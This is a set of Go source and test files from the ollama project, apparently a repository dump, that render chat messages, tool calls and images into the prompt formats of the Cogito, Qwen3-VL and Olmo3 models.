AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|>Hi there!<|end▁of▁sentence|><|User|>How are you?<|Assistant|><think> `, }, { name: "multi_with_system_thinking_false", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant"}, {Role: "user", Content: "Start"}, {Role: "assistant", Content: "Okay"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant<|User|>Start<|Assistant|>Okay<|end▁of▁sentence|><|Assistant|>`, }, { name: "multi_with_system_thinking_true", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant"}, {Role: "user", Content: "Start"}, {Role: "assistant", Content: "Okay"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant <|User|>Start<|Assistant|>Okay<|end▁of▁sentence|><|Assistant|><think> `, }, { name: "multi_with_system2_thinking_false", messages: []api.Message{ {Role: "system", Content: "You are a pirate chatbot who always responds in pirate speak!"}, {Role: "user", Content: "Give me a short introduction to LLMs."}, {Role: "assistant", Content: "Arrr! I'm a pirate"}, {Role: "user", Content: "Tell me more about LLMs."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a pirate chatbot who always responds in pirate speak!<|User|>Give me a short introduction to LLMs.<|Assistant|>Arrr! I'm a pirate<|end▁of▁sentence|><|User|>Tell me more about LLMs.<|Assistant|>`, }, { name: "multi_with_system2_thinking_true", messages: []api.Message{ {Role: "system", Content: "You are a pirate chatbot who always responds in pirate speak!"}, {Role: "user", Content: "Give me a short introduction to LLMs."}, {Role: "assistant", Content: "Arrr! I'm a pirate"}, {Role: "user", Content: "Tell me more about LLMs."}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a pirate chatbot who always responds in pirate speak! <|User|>Give me a short introduction to LLMs.<|Assistant|>Arrr! I'm a pirate<|end▁of▁sentence|><|User|>Tell me more about LLMs.<|Assistant|><think> `, }, // tools { name: "tool_calls_only_no_content", messages: []api.Message{ {Role: "user", Content: "Get weather for Paris"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Get weather for Paris<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "complex_tool_arguments", messages: []api.Message{ {Role: "user", Content: "Process complex data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "process_data", Arguments: testArgsOrdered([]orderedArg{ {"config", map[string]any{ "enabled": true, "threshold": 0.95, "tags": []string{"important", "urgent"}, }}, {"items", []any{"item1", "item2", "item3"}}, }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Process complex data<|Assistant|><|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>process_data ` + "```json\n" + `{"config":{"enabled":true,"tags":["important","urgent"],"threshold":0.95},"items":["item1","item2","item3"]} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "empty_messages", messages: []api.Message{ {Role: "system", Content: ""}, {Role: "user", Content: "Hello"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello<|Assistant|><|end▁of▁sentence|><|Assistant|>`, }, { name: "thinking_with_empty_assistant_content", messages: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Content: ""}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Think about this<|Assistant|><|end▁of▁sentence|><|Assistant|><think> `, }, { name: "multiple_system_messages", messages: []api.Message{ {Role: "system", Content: "First instruction"}, {Role: "system", Content: "Second instruction"}, {Role: "user", Content: "Hello"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. First instruction<|User|>Hello<|Assistant|>`, }, { name: "special_characters_in_content", messages: []api.Message{ {Role: "user", Content: "What about <|special|> tokens and \"quotes\"?"}, {Role: "assistant", Content: "They're handled normally in content."}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What about <|special|> tokens and "quotes"?<|Assistant|>They're handled normally in content.<|end▁of▁sentence|><|Assistant|>`, }, { name: "long_conversation_multiple_rounds", messages: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!"}, {Role: "user", Content: "How are you?"}, {Role: "assistant", Content: "Good, thanks!"}, {Role: "user", Content: "What's the weather?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hi<|Assistant|>Hello!<|end▁of▁sentence|><|User|>How are you?<|Assistant|>Good, thanks!<|end▁of▁sentence|><|User|>What's the weather?<|Assistant|>`, }, } renderer := &CogitoRenderer{isThinking: true} for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := renderer.Render(tt.messages, tt.tools, tt.thinkValue) if err != nil { t.Fatalf("Render() error = %v", err) } if diff := cmp.Diff(tt.expected, rendered); diff != "" { t.Errorf("Render() mismatch (-want +got):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3vl_nonthinking_test.go
model/renderers/qwen3vl_nonthinking_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3VLNonThinkingRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message images []api.ImageData tools []api.Tool useImgTags bool expected string }{ { name: "prefill", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Tell me something interesting."}, {Role: "assistant", Content: "I'll tell you something interesting about cats"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Tell me something interesting.<|im_end|> <|im_start|>assistant I'll tell you something interesting about cats`, }, { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant `, }, { name: "With thinking, end assistant.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think>"}, // does the thinking even work? }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think>`, }, { name: "Multiple thinking", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>`, // NOTE: the second thinking tag is not captured }, { name: "Multiple thinking, multiple messages.", msgs: []api.Message{ {Role: "user", Content: "Tell me a story in two sentences."}, {Role: "assistant", Content: "abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think>"}, {Role: "user", Content: "What is the weather like in San Francisco? <think>I will check the weather in San Francisco for you.</think>"}, {Role: "assistant", Content: "I'll check the weather in San Francisco for you.<think>Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.</think>"}, }, expected: `<|im_start|>user Tell me a story in two sentences.<|im_end|> <|im_start|>assistant abc<think>To make this story interesting, I will speak in poetry.</think><think>And I will speak in poetry after the first sentence.</think><|im_end|> <|im_start|>user What is the weather like in San Francisco? <think>I will check the weather in San Francisco for you.</think><|im_end|> <|im_start|>assistant I'll check the weather in San Francisco for you.<think>Speak poetry after the first sentence.</think><think>Speak poetry after the second sentence.</think>`, }, { name: "Image", msgs: []api.Message{ {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|>Describe this image.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, { name: "Image with image tags", msgs: []api.Message{ {Role: "user", Content: "Describe this image.", Images: []api.ImageData{api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, useImgTags: true, expected: `<|im_start|>user [img]Describe this image.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, { name: "Multiple images", msgs: []api.Message{ {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|><|vision_start|><|image_pad|><|vision_end|>Describe these images.<|im_end|> <|im_start|>assistant `, }, { name: "Multiple images with image tags", msgs: []api.Message{ {Role: "user", Content: "Describe these images.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, {Role: "assistant", Content: "Let me analyze this image."}, }, useImgTags: true, expected: `<|im_start|>user [img][img]Describe these images.<|im_end|> <|im_start|>assistant Let me analyze this image.`, }, // // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "with tools and response", // msgs: []api.Message{ // {Role: "system", Content: "You are a helpful assistant with access to tools."}, // {Role: "user", Content: "What's the weather like in New York?"}, // { // Role: "assistant", // Content: "I'll check the weather in New York for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "get-current-weather", // Arguments: map[string]any{ // "location": "New York", // "unit": "fahrenheit", // }, // }, // }, // }, // }, // {Role: "tool", Content: "80", ToolName: "get-current-weather"}, // {Role: "user", Content: "That sounds nice! What about San Francisco?"}, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "get-current-weather", // Description: "Get the current weather for a location", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"location"}, // Properties: map[string]api.ToolProperty{ // "location": { // Type: api.PropertyType{"string"}, // Description: "The city and state, e.g. San Francisco, CA", // }, // "unit": { // Type: api.PropertyType{"string"}, // Enum: []any{"celsius", "fahrenheit"}, // Description: "The temperature unit", // }, // }, // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "get-current-weather", "description": "Get the current weather for a location", "parameters": {"type": "object", "properties": {"location": {"type": "string", "description": "The city and state, e.g. San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"], "description": "The temperature unit"}}, "required": ["location"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // What's the weather like in New York?<|im_end|> // <|im_start|>assistant // I'll check the weather in New York for you. // <tool_call> // {"name": "get-current-weather", "arguments": {"location": "New York", "unit": "fahrenheit"}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 80 // </tool_response><|im_end|> // <|im_start|>user // That sounds nice! What about San Francisco?<|im_end|> // <|im_start|>assistant // `, // }, // // NOTE: solved with #12518: https://github.com/ollama/ollama/compare/main...drifkin/stable-tool-args // { // name: "With tools and response, multiple tool calls", // msgs: []api.Message{ // { // Role: "system", // Content: "You are a helpful assistant with access to tools.", // }, // { // Role: "user", // Content: "Call two tools for me: add and multiply.", // }, // { // Role: "assistant", // Content: "Sure, I'll call both tools for you.", // ToolCalls: []api.ToolCall{ // { // Function: api.ToolCallFunction{ // Name: "add", // Arguments: map[string]any{ // "a": 2, // "b": 3, // }, // }, // }, // { // Function: api.ToolCallFunction{ // Name: "multiply", // Arguments: map[string]any{ // "x": 4, // "y": 5, // }, // }, // }, // }, // }, // { // Role: "tool", // Content: "5", // ToolName: "add", // }, // { // Role: "tool", // Content: "20", // ToolName: "multiply", // }, // { // Role: "user", // Content: "Thanks! What are the results?", // }, // }, // tools: []api.Tool{ // { // Type: "function", // Function: api.ToolFunction{ // Name: "add", // Description: "Add two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"a", "b"}, // Properties: map[string]api.ToolProperty{ // "a": {Type: api.PropertyType{"integer"}, Description: "First number"}, // "b": {Type: api.PropertyType{"integer"}, Description: "Second number"}, // }, // }, // }, // }, // { // Type: "function", // Function: api.ToolFunction{ // Name: "multiply", // Description: "Multiply two numbers", // Parameters: api.ToolFunctionParameters{ // Type: "object", // Required: []string{"x", "y"}, // Properties: map[string]api.ToolProperty{ // "x": {Type: api.PropertyType{"integer"}, Description: "First factor"}, // "y": {Type: api.PropertyType{"integer"}, Description: "Second factor"}, // }, // }, // }, // }, // }, // expected: `<|im_start|>system // You are a helpful assistant with access to tools. // # Tools // You may call one or more functions to assist with the user query. // You are provided with function signatures within <tools></tools> XML tags: // <tools> // {"type": "function", "function": {"name": "add", "description": "Add two numbers", "parameters": {"type": "object", "properties": {"a": {"type": "integer"}, "b": {"type": "integer"}}, "required": ["a", "b"]}}} // {"type": "function", "function": {"name": "multiply", "description": "Multiply two numbers", "parameters": {"type": "object", "properties": {"x": {"description": "First factor"}, "y": {"description": "Second factor"}}, "required": ["x", "y"]}}} // </tools> // For each function call, return a json object with function name and arguments within <tool_call></tool_call> XML tags: // <tool_call> // {"name": <function-name>, "arguments": <args-json-object>} // </tool_call><|im_end|> // <|im_start|>user // Call two tools for me: add and multiply.<|im_end|> // <|im_start|>assistant // Sure, I'll call both tools for you. // <tool_call> // {"name": "add", "arguments": {"a": 2, "b": 3}} // </tool_call> // <tool_call> // {"name": "multiply", "arguments": {"x": 4, "y": 5}} // </tool_call><|im_end|> // <|im_start|>user // <tool_response> // 5 // </tool_response> // <tool_response> // 20 // </tool_response><|im_end|> // <|im_start|>user // Thanks! What are the results?<|im_end|> // <|im_start|>assistant // `, // }, { name: "user tool_response block preserved", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "Thanks!"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. <tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response><|im_end|> <|im_start|>user Thanks!<|im_end|> <|im_start|>assistant `, }, { name: "assistant with multiple tool calls and content", msgs: []api.Message{ {Role: "user", Content: "Hi"}, { Role: "assistant", Content: "before", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "add", Arguments: testArgsOrdered([]orderedArg{{"a", 2}, {"b", 3}})}}, {Function: api.ToolCallFunction{Name: "mul", Arguments: testArgsOrdered([]orderedArg{{"x", 4}, {"y", 5}})}}, }, }, }, expected: `<|im_start|>user Hi<|im_end|> <|im_start|>assistant before <tool_call> {"name": "add", "arguments": {"a": 2, "b": 3}} </tool_call> <tool_call> {"name": "mul", "arguments": {"x": 4, "y": 5}} </tool_call>`, }, { name: "consecutive tool responses grouped", msgs: []api.Message{ {Role: "user", Content: "Compute results"}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "job", Arguments: testArgs(map[string]any{"n": 1})}}}}, {Role: "tool", Content: "5", ToolName: "job"}, {Role: "tool", Content: "6", ToolName: "job"}, }, expected: `<|im_start|>user Compute results<|im_end|> <|im_start|>assistant ok <tool_call> {"name": "job", "arguments": {"n": 1}} </tool_call><|im_end|> <|im_start|>user <tool_response> 5 </tool_response> <tool_response> 6 </tool_response><|im_end|> <|im_start|>assistant `, }, { name: "last message is tool then prefill", msgs: []api.Message{ {Role: "user", Content: "run"}, {Role: "assistant", Content: "ok", ToolCalls: []api.ToolCall{{Function: api.ToolCallFunction{Name: "exec", Arguments: testArgs(map[string]any{"cmd": "ls"})}}}}, {Role: "tool", Content: "done", ToolName: "exec"}, }, expected: `<|im_start|>user run<|im_end|> <|im_start|>assistant ok <tool_call> {"name": "exec", "arguments": {"cmd": "ls"}} </tool_call><|im_end|> <|im_start|>user <tool_response> done </tool_response><|im_end|> <|im_start|>assistant `, }, { name: "user with multiple images", msgs: []api.Message{ {Role: "user", Content: "Describe.", Images: []api.ImageData{api.ImageData("img1"), api.ImageData("img2")}}, }, expected: `<|im_start|>user <|vision_start|><|image_pad|><|vision_end|><|vision_start|><|image_pad|><|vision_end|>Describe.<|im_end|> <|im_start|>assistant `, }, { name: "user tool_response, no whitespace", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "<tool_response>\n18\n</tool_response>"}, {Role: "user", Content: "Thanks!"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. <tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response><|im_end|> <|im_start|>user Thanks!<|im_end|> <|im_start|>assistant `, }, { name: "user tool_response with surrounding whitespace", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "I'll check.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get-current-weather", Arguments: testArgsOrdered([]orderedArg{{"location", "Paris"}, {"unit", "celsius"}})}}, }, }, {Role: "user", Content: "\n\n\n\n<tool_response>\n18\n</tool_response> extra\n\n\n\n\n\n"}, }, expected: `<|im_start|>user What's the weather?<|im_end|> <|im_start|>assistant I'll check. <tool_call> {"name": "get-current-weather", "arguments": {"location": "Paris", "unit": "celsius"}} </tool_call><|im_end|> <|im_start|>user <tool_response> 18 </tool_response> extra <|im_end|> <|im_start|>assistant `, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3VLRenderer{isThinking: false, useImgTags: tt.useImgTags}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/cogito.go
model/renderers/cogito.go
package renderers import ( "encoding/json" "strings" "github.com/ollama/ollama/api" ) type CogitoRenderer struct { isThinking bool } func (r *CogitoRenderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) { var sb strings.Builder defaultPrompt := "You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco." // thinking is enabled: model must support it AND user must request it (true) enableThinking := r.isThinking && (thinkValue != nil && thinkValue.Bool()) var systemPrompt string var conversationMessages []api.Message if len(messages) > 0 && messages[0].Role == "system" { systemPrompt = messages[0].Content conversationMessages = messages[1:] } else { conversationMessages = messages } var finalSystemPrompt string if enableThinking { finalSystemPrompt = "Enable deep thinking subroutine.\n\n" + defaultPrompt if systemPrompt != "" { finalSystemPrompt += "\n\n" + systemPrompt + "\n\n" } } else { finalSystemPrompt = defaultPrompt if systemPrompt != "" { finalSystemPrompt += "\n\n" + systemPrompt } } if len(tools) > 0 { if finalSystemPrompt != "" { finalSystemPrompt += "\nYou have the following functions available:\n" } else { finalSystemPrompt = "You have the following functions available:\n" } for _, tool := range tools { toolJSON, _ := json.MarshalIndent(tool, "", " ") // TODO(gguo): double check json format finalSystemPrompt += "```json\n" + string(toolJSON) + "\n```\n" } } sb.WriteString("<|begin▁of▁sentence|>" + finalSystemPrompt) outputsOpen := false isLastUser := false for i, message := range conversationMessages { switch message.Role { case "user": isLastUser = true sb.WriteString("<|User|>" + message.Content + "<|Assistant|>") case "assistant": isLastUser = false if len(message.ToolCalls) > 0 { if message.Content != "" { sb.WriteString(message.Content) } sb.WriteString("<|tool▁calls▁begin|>") for j, toolCall := range message.ToolCalls { sb.WriteString("<|tool▁call▁begin|>function<|tool▁sep|>" + toolCall.Function.Name) argsJSON, _ := json.Marshal(toolCall.Function.Arguments) sb.WriteString("\n```json\n" + string(argsJSON) + "\n```") sb.WriteString("<|tool▁call▁end|>") if j < len(message.ToolCalls)-1 { sb.WriteString("\n") } } sb.WriteString("<|tool▁calls▁end|><|end▁of▁sentence|>") } else { sb.WriteString(message.Content + "<|end▁of▁sentence|>") } case "tool": isLastUser = false if !outputsOpen { sb.WriteString("<|tool▁outputs▁begin|>") outputsOpen = true } sb.WriteString("<|tool▁output▁begin|>" + message.Content + "<|tool▁output▁end|>") hasNextTool := i+1 < len(conversationMessages) && conversationMessages[i+1].Role == "tool" if hasNextTool { sb.WriteString("\n") } else { sb.WriteString("<|tool▁outputs▁end|>") outputsOpen = false } } } if outputsOpen { sb.WriteString("<|tool▁outputs▁end|>") } if !isLastUser { sb.WriteString("<|Assistant|>") } if enableThinking { sb.WriteString("<think>\n") } return sb.String(), nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/olmo3_test.go
model/renderers/olmo3_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestOlmo3Renderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool expected string }{ { name: "basic without system - adds default system", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "with system message no tools", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "with system message and tools", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What is the weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, expected: "<|im_start|>system\n" + `You are a helpful assistant.<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "default system with tools - includes function instruction", msgs: []api.Message{ {Role: "user", Content: "What is the weather?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "assistant with tool calls - function call syntax", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What is the weather in SF?"}, { Role: "assistant", Content: "Let me check the weather.", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "San Francisco", }), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`, ToolName: "get_weather"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"location"}, Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}, Description: "The city"}, }), }, }, }, }, expected: "<|im_start|>system\n" + `You are a helpful assistant.<functions>[{"type": "function", "function": {"name": "get_weather", "description": "Get the current weather", "parameters": {"type": "object", "required": ["location"], "properties": {"location": {"type": "string", "description": "The city"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "What is the weather in SF?<|im_end|>\n" + "<|im_start|>assistant\n" + `Let me check the weather.<function_calls>get_weather(location="San Francisco")</function_calls><|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 68}<|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "multi-turn conversation", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!<|im_end|>\n" + "<|im_start|>user\n" + "How are you?<|im_end|>\n" + "<|im_start|>assistant\n", }, { name: "parallel tool calls - newline separated", msgs: []api.Message{ {Role: "user", Content: "Get weather in SF and NYC"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "San Francisco"}), }, }, { ID: "call_2", Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"location": "New York"}), }, }, }, }, {Role: "tool", Content: `{"temperature": 68}`, ToolName: "get_weather"}, {Role: "tool", Content: `{"temperature": 55}`, ToolName: "get_weather"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": {Type: api.PropertyType{"string"}}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within <function_calls></function_calls> XML tags. Do not make assumptions about what values to plug into functions." + `<functions>[{"type": "function", "function": {"name": "get_weather", "parameters": {"type": "object", "properties": {"location": {"type": "string"}}}}}]</functions><|im_end|>` + "\n" + "<|im_start|>user\n" + "Get weather in SF and NYC<|im_end|>\n" + "<|im_start|>assistant\n" + `<function_calls>get_weather(location="San Francisco")` + "\n" + `get_weather(location="New York")</function_calls><|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 68}<|im_end|>` + "\n" + "<|im_start|>environment\n" + `{"temperature": 55}<|im_end|>` + "\n" + "<|im_start|>assistant\n", }, { name: "tool call with multiple arguments", msgs: []api.Message{ {Role: "user", Content: "Book a flight"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { ID: "call_1", Function: api.ToolCallFunction{ Name: "book_flight", Arguments: testArgsOrdered([]orderedArg{ {"from", "SFO"}, {"to", "NYC"}, }), }, }, }, }, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "book_flight", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsOrdered([]orderedProp{ {"from", api.ToolProperty{Type: api.PropertyType{"string"}}}, {"to", api.ToolProperty{Type: api.PropertyType{"string"}}}, }), }, }, }, }, expected: "<|im_start|>system\n" + "You are a helpful function-calling AI assistant. " + "You are provided with function signatures within <functions></functions> XML tags. You may call one or more functions to assist with the user query. Output any function calls within 